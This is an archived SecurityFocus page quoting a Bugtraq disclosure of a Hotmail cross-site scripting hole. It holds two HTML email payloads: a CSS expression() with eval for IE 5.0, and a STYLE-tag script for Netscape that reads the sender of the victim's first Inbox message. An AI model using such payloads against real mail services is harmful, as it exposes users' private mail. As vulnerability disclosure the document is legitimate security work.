Hotmail Javascript STYLE Vulnerability

From Georgi Guninski's <joro@nat.bg> post to Bugtraq:

The code that must be embeded in a HTML email message is:
For IE 5.0:

<P STYLE="left:expression(eval('alert(\'JavaScript is
executed\');window.close()'))" >

For Netscape Communicator:

<STYLE TYPE="text/javascript">
alert('JavaScript is executed');
a=window.open(document.links[2]);
setTimeout('alert(\'The first message in your Inbox is from:
\'+a.document.links[26].text)',20000);
</STYLE>


 

Privacy Statement
Copyright 2010, SecurityFocus